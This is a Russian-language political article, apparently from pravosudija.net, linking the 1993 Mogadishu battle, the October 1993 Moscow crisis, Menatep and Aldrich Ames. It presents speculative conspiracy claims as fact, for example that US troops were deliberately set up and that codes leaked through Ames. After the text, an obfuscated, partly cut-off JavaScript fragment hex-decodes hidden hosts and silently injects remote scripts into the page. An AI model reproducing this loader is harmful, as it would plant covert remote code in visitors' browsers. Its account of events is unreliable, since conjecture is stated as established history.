Материалы разведки. Часть 1.1 Scofield: Не повторять ошибок прошлого
Материалы разведки. Часть 1.1
Scofield: Не повторять ошибок прошлого

Олдрич Хейзен Эймс
Сражение в Могадишо произошло 03-04 октября 1993 года.
Дата настолько знакома, что не может быть простым совпадением.
21 сентября 1993 г. — издание президентом РФ Б.Н. Ельциным указа № 1400 о роспуске Съезда народных депутатов и Верховного Совета.
03 октября 1993 г. — провокация у телецентра «Останкино».
04 октября 1993 г. — штурм Дома Советов (Белого дома).
Другими словами, события в Могадишо (когда американских военнослужащих специально подставили под моджахедов Усамы бен Ладена) и события в Москве происходили одновременно. Такой синхрон должен был привести к смене власти в РФ и в США, т.к. Б. Клинтону предъявили бы не только Сомали, но и потерю контроля над Россией.
Однако, расстрел Белого Дома позволил Б.Н. Ельцину сохранить президентское кресло и это же помогло удержаться Б. Клинтону и его команде.
Один из участников октябрьских событий в Москве так объяснил причины конфликта:
http://portal-kultura.ru/articles/country/10035-kirsan-ilyumzhinov-v-osnove-konflikta-lezhal-raznyy-podkhod-k-privatizatsii/?print=Y&CODE=10035-kirsan-ilyumzhinov-v-osnove-konflikta-lezhal-raznyy-podkhod-k-privatizatsii(03.10.2013)
Кирсан Илюмжинов: В сентябре 1993 года, когда стало ясно, что конфликт между президентом и Верховным Советом становится необратимым, по инициативе нескольких политиков — Рамазана Абдулатипова, Анатолия Собчака и моей — был создан Совет субъектов Федерации, это был прообраз нынешнего Совета Федерации. Очень многие руководители регионов и председатели законодательных собраний, которые были против жесткого конфликта, вошли в него. Меня и Вадима Густова, председателя Леноблсовета, избрали сопредседателями. Мы собрались в кабинете председателя Конституционного суда Валерия Дмитриевича Зорькина, и составили обращение к враждующим сторонам. Его подписали 68 человек.
Культура: Какой план действий был у вас?
Илюмжинов: Чтобы не допустить войны и раскола в обществе, мы предложили принять так называемый «нулевой вариант». Чтобы Верховный Совет отменил свое постановление по импичменту Бориса Николаевича, а тот, в свою очередь, — свой указ о роспуске Верховного Совета. То есть призвали стороны вернуться к исходным позициям.…
Илюмжинов: Нет, конечно. Дело в том, что некоторые члены Верховного Совета подписали письмо в поддержку Ельцина. А я не стал. И мне кажется сейчас, через двадцать лет, что я прав был тогда. Тот подход к развитию страны, который предлагал Верховный Совет, как минимум заслуживал внимания. Там же были уважаемые люди, с большим профессиональным и жизненным опытом. Генеральные директора заводов, производственники, прошедшие путь от мастера до министра. Далеко не всем нравилось, что делают младореформаторы, эти «чикагские мальчики», лаборанты, которые ни дня на производстве не проработали.…
Культура: То есть в основе конфликта лежал разный подход к приватизации?
Илюмжинов: Конечно! Экономическая составляющая была, на мой взгляд, острее, чем конфликт характеров — Ельцина с одной стороны и Хасбулатова с Руцким — с другой. Я Бориса Николаевича поддерживал, я его уважал и уважаю, он мне в жизни во многом помог. Но и в Верховном Совете были неглупые люди. Предложенная ими программа была ближе к китайскому варианту — чтобы в собственности государства оставить стратегические отрасли, в частности оборонную и другие. А остальное отдать бизнесу — в том числе малому и среднему. И за это их расстреляли. А сейчас прошло двадцать лет, и мы возвращаемся к тому, чего тогда не приняли...(конец цитаты).
Итак, разные модели приватизации. Остаются Б. Ельцин и Б. Клинтон — один вариант и список бенефициаров, уходят — другой вариант и другой список.
http://www.sovsekretno.ru/articles/id/1146/(01.02.2004) В марте 1993 года открылся съезд Верховного Совета, на котором началось жесткое противостояние президента и парламента. Оно завершилось в октябре подавленной попыткой военного переворота, но с марта по октябрь у «элиты», а точнее у ближнего круга Ельцина, не было уверенности в своей победе, поэтому круг этот на всякий случай готовил себе путь в эмиграцию.
… Версия эта основана на информации Карон фон Герке-Томпсон — вице-президента вашингтонской консалтинговой фирмы First Columbia, Inc. Именно к ней обратились в апреле 1993 года Конаныхин и Цыдорчук с предложением помочь в открытии оффшорного банка и в приобретении паспортов. Герке-Томпсон не занималась ни тем, ни другим, но ее насторожило утверждение Конаныхина о том, что, будучи вице-президентом банка «Менатеп», он контролирует его активы на сумму 1,7 миллиарда долларов и что первоначальная капитализация новоучрежденного банка составит один миллиард. Это было время, когда в конгрессе США обсуждался вопрос о предоставлении правительству России финансовой помощи на сумму 4 миллиарда. 100 паспортов натурализованных граждан, по словам Конаныхина, предназначались для привилегированных клиентов банка «Менатеп», готовых инвестировать в экономику страны своего нового гражданства по 100 миллионов долларов каждый, 25 паспортов должны быть оформлены на сотрудников банка; кроме того, требовалось 15 дипломатических паспортов для «особых клиентов» — вот за них Конаныхин будто бы был готов платить «любые деньги».
… Предложение до такой степени обеспокоило Герке-Томпсон, что она позвонила в ЦРУ. Из Лэнгли — она называет своих кураторов «мистер Зи» и «мистер Ви» (Mr. Z и Mr. V) — ей ответили, что разведка весьма интересуется деятельностью Конаныхина и Ходорковского по отмыванию «миллиардов долларов, похищенных сотрудниками КГБ и высокопоставленными должностными лицами» России. По словам Герке-Томпсон, Конаныхин и Цыдорчук снимали офис в отеле Willard — одной из старейших и роскошнейших гостиниц Вашингтона, расположенной через дорогу от Белого дома. У нее создалось впечатление, подтвержденное «мистером Ви», что боссом была Цыдорчук (полное тройное имя этой дамы — Cidorchuk-Heinz-Volevok), получавшая указания непосредственно из Москвы и Бог весть куда потом подевавшаяся.
В конце июля — начале августа вопрос о паспортах стал срочным. Под неослабевающим давлением Конаныхина и Цыдорчук First Columbia договорилась о встрече с дипломатами из посольства Уругвая и составила формальный контракт, однако подписывать его оказалось не с кем — оба клиента отбыли в деловую поездку. 21 сентября Герке-Томпсон удалось дозвониться Елене Цыдорчук, которая отменила все прежние договоренности и попросила ее больше не звонить. На просьбу позвать к телефону Конаныхина Цыдорчук ответила, что ее компаньон находится в Турции и что именно он и распорядился прекратить всякие контакты с First Columbia, поскольку, дескать, выяснилось, что контора эта подставная.
Спустя почти год друзья в ЦРУ рассказали Герке-Томпсон, что операция по разоблачению финансовых схем московских коррупционеров была раскрыта «кротом» СВР Олдричем Эймсом, находившимся в Турции в то же время и в том же месте, что и Конаныхин, хотя вместе их никто и не видел.
Люди из Лэнгли дали ей понять, что высокие политические интересы пришли в противоречие с информацией разведки и администрация Клинтона приняла решение закрыть глаза на разгул коррупции в России(конец цитаты).
С учетом того, что М.Б.Х. работал в интересах компании Вангард, можно предположить, что деятельность вице-президента банка «Менатеп» А. Конаныхина в 1993 году была изначально «подставной», чтобы команду Б. Ельцина обвинить в коррумпированности, а команду Б. Клинтона в «закрытии глаз на эти преступления». Подобная схема была реализована в 1999 году, когда был раскручен скандал с отмыванием денег через BankofNewYork. Собственно и материал о Карон фон Герке-Томпсон (Karon von Gerhke-Thompson) появился в это время — 23.09.1999 г. в TheGuardian(см.http://www.theguardian.com/world/1999/sep/23/julianborger). Цель публикации — обвинение администрации Б. Клинтона.
Но в 1993 году эта попытка не удалась, так как о начале операции ЦРУ сообщил Олдрич Эймс.
http://www.e-reading.club/chapter.php/1010015/152/Pyhalov_-_CRU_i_drugie_specsluzhby_SShA.html(И. Пыхалов «ЦРУ и другие спецслужбы США)
В 1983 году О. Эймс был назначен начальником контрразведывательного подразделения отдела СССР и Восточной Европы Оперативного директората ЦРУ.
… В октябре 1990 г. Эймса переводят в созданный за два года до этого контрразведывательный центр, где он занимается аналитической работой, связанной с проникновением в КГБ. В августе 1991 г. Эймс временно возвращается в отдел Советского Союза и стран Восточной Европы начальником так называемой «рабочей группы по КГБ», в задачу которой входило окончательное разрушение КГБ СССР. В конце сентября 1991 г. группа была ликвидирована, а Эймс получил назначение в Центр по борьбе с наркотиками, организационно входящий в состав Разведывательного директората ЦРУ.
В Центре Эймс отвечал за причерноморские страны и Балканский полуостров.
… В конце февраля 1994 г. Эймсу предстояла служебная командировка в Москву, где он должен был встретиться с представителями российских спецслужб с целью налаживания сотрудничества в борьбе с наркомафией. В результате 21 февраля 1994 г. ФБР арестовало Эймса недалеко от его дома, когда он возвращался с работы(конец цитаты).
О. Эймс передал информацию в Москву и в результате были оборваны контакты А. Конаныхина с К. Герке-Томпсон. А на них очень рассчитывали те, кто планировал удалить от дел связку Б. Ельцин-Б. Клинтон.
Поэтому в октябре 1993 года, когда был организован провал ССО США в Могадишо, появилась информация о том, что секретные коды попали моджахедам через О. Эймса.
Более того, из Москвы была «слита» информация и О. Эймс был арестован в США.
Вот заявление Н. Леонова, бывшего замначальника ПГУ КГБ СССР по Западному полушарию (сентябрь 1983 г. – январь 1991 г.), начальника аналитического управления КГБ (январь 1991 г. – август 1991 г.): «Я могу с уверенностью предположить, что Эймса предали. И предали в Москве. Долгие годы я лично занимался технологией обеспечения связи с нашей агентурой в США. В течение десяти последних лет она срабатывала безупречно, была неуязвимой. Прокол был невозможен. Все эти рассказы о компрометирующих материалах против Эймса, якобы найденных в его мусорных ящиках, об обративших на себя внимание расходах рассчитаны на дураков. Эймса, как и Уокера, которого якобы предала сама жена, «сдали» в Москве. И сделали это лица, имевшие служебное отношение к делу Эймса». (Заворотный С. Прокол Эймса в США был невозможен. Его предали в Москве // Комсомольская правда. 22 декабря 1994).
Разоблачение О. Эймса привело к отставке директора ЦРУ Джеймса Вулси (R. James Woolsey, Jr.), назначенного Б. Клинтоном 05.02.1993 г.
http://www.e-reading.club/chapter.php/1010015/152/Pyhalov_-_CRU_i_drugie_specsluzhby_SShA.html(И. Пыхалов «ЦРУ и другие спецслужбы США) В адрес ЦРУ посыпались во многом обоснованные обвинения в попустительстве и бездействии. В результате возглавлявший в то время ЦРУ Джеймс Вулси был вынужден подать в отставку. Если учесть, что директором ЦРУ он был утверждён лишь 5 февраля 1993 г., а до этого занимался частной юридической практикой, не имея отношения к главной американской спецслужбе, то становится очевидным, что никакой личной ответственности за деятельность Эймса в стенах ЦРУ Вулси нести не может.
… Сменивший Вулси новый директор Джон Дейч начал в ЦРУ массовую чистку. Были уволены 1-й заместитель директора Уильям Студеман, исполнительный директор Лео Хэзлвуд, замдиректора по операциям Джек Девайн, замдиректора по разведке Дуглас Мак-Ичин, то есть практически всё высшее руководство. Пострадали и многие сотрудники более низкого ранга. Всё это не могло не дезорганизовать на какое-то время работу ЦРУ(конец цитаты).
Соответственно, не только в Пентагоне (после вывода войск из Сомали), но и в ЦРУ (после смены директора) были сформированы антиклинтоновские настроения. Поэтому у кандидата в президенты США на выборах 1996 года Р. Доула (Robert Joseph «Bob» Dole) были серьезные шансы на победу.
В материале http://pravosudija.net/article/scofield-politicheskoe-masterstvo-nnazarbaeva(07.12.2015) рассматривались особенности деятельности Боба Доула при поддержке силового блока компании Вангард.
Однако, в 1996 году его президентство сорвалось.
И отчасти опять благодаря информации от О. Эймса.
http://pravosudija.net/article/scofield-ne-povtoryat-oshibok-proshlogo
<script type="text/javascript">// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "maxpark.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}(); // ]]></script>
Комментарии